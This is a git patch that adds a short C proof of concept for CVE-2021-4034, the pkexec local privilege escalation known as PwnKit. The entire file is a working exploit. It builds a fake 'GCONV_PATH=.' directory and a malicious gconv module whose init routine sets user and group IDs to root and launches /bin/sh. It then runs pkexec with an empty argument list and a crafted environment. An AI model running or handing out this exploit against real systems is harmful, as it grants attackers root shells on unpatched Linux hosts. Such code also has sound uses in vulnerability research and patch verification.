From 282f5160c69b776051740f8649416f7220a0f556 Mon Sep 17 00:00:00 2001
From: Andris Raugulis <moo@arthepsy.eu>
Date: Wed, 26 Jan 2022 00:59:53 +0000
Subject: [PATCH] Add simple CVE-2021-4034 PoC

---
 cve-2021-4034-poc.c | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)
 create mode 100644 cve-2021-4034-poc.c

diff --git a/cve-2021-4034-poc.c b/cve-2021-4034-poc.c
new file mode 100644
index 0000000..b274108
--- /dev/null
+++ b/cve-2021-4034-poc.c
@@ -0,0 +1,27 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+char *shell = 
+	"#include <stdio.h>\n"
+	"#include <stdlib.h>\n"
+	"#include <unistd.h>\n\n"
+	"void gconv() {}\n"
+	"void gconv_init() {\n"
+	"	setuid(0); setgid(0);\n"
+	"	seteuid(0); setegid(0);\n"
+	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
+	"	exit(0);\n"
+	"}";
+
+int main(int argc, char *argv[]) {
+	FILE *fp;
+	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
+	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
+	fp = fopen("pwnkit/pwnkit.c", "w");
+	fprintf(fp, "%s", shell);
+	fclose(fp);
+	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
+	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
+	execve("/usr/bin/pkexec", (char*[]){NULL}, env);
+}